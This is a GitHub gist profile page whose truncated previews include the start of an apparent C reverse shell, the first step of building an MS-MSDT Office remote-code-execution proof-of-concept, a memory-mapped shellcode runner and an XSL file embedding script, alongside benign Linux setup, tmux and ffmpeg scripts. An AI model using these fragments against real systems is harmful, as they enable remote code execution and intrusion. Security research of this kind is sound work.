Skip to content

Instantly share code, notes, and snippets.

View CerebralMischief's full-sized avatar

Cerebral Mischief CerebralMischief

View GitHub Profile
// gcc -g -o L1 lin_1.c
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234
#define RH "127.0.0.1"
#define BIN "/bin/sh"
int main(){
int is = 0;is = socket(AF_INET,SOCK_STREAM,0);
struct sockaddr_in s1;
@CerebralMischief
CerebralMischief / ms-msdt.MD
Created June 3, 2022 12:41 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@CerebralMischief
CerebralMischief / Socks5.cs
Created January 30, 2021 13:54 — forked from zHaytam/Socks5.cs
A Socks5 implementation in .NET Core (C# 8)
using System;
using System.Globalization;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading.Tasks;
namespace Socks
{
public static class Socks5
@CerebralMischief
CerebralMischief / arch-linux-install
Created September 19, 2019 20:22 — forked from welte/arch-linux-install
Minimal instructions for installing arch linux on an UEFI NVMe system with full system encryption using dm-crypt and luks
# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.
# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux
# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.
# Set swiss-french keymap
@CerebralMischief
CerebralMischief / starttmux.sh
Created May 29, 2019 16:03 — forked from todgru/starttmux.sh
Start up tmux with custom windows, panes and applications running
#!/bin/sh
#
# Setup a work space called `work` with two windows
# first window has 3 panes.
# The first pane set at 65%, split horizontally, set to api root and running vim
# pane 2 is split at 25% and running redis-server
# pane 3 is set to api root and bash prompt.
# note: `api` aliased to `cd ~/path/to/work`
#
session="work"
@CerebralMischief
CerebralMischief / arch-firstboot.md
Last active August 24, 2018 15:50 — forked from kevinwright/arch-firstboot.md
Arch first-boot configuration. Setup the first user, sudo, vm tools, and enough of a dev env to support AUR+yaourt

OpenSSH daemon

pacman -S openssh
systemctl start sshd
systemctl enable sshd.socket

Sudoers

@CerebralMischief
CerebralMischief / proresproxy.sh
Created August 17, 2018 05:49 — forked from kevinwright/proresproxy.sh
Use ffmpeg to build prores proxies for Premiere Pro
#!/usr/bin/env bash
# Usage notes
# ===========
#
# proxy_watermark.png needs to be in the same directory as the script
# download from here: http://whoismatt.com/images/2016/7-july/adobe_proxy_logo.png
#
# on OSX, both pv and ffmpeg will need to be installed via homebrew
#!/usr/bin/bash
loadkeys fr
# ssd clearing (wiki.archlinux.org/index.php/SSD_memory_cell_clearing)
hdparm -I /dev/sda # and ensure the ssd is not frozen
hdparm --user-master u --security-set-pass MyPaSsWoRd /dev/sda
hdparm -I /dev/sda # in order to check
hdparm --user-master u --security-erase MyPaSsWoRd /dev/sda
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main(int argc, char **argv) {
unsigned char bytes[] = {
0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0x90, // rep*14 nop
0xc3 // ret
};
unsigned char *code = (unsigned char *) mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC,
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[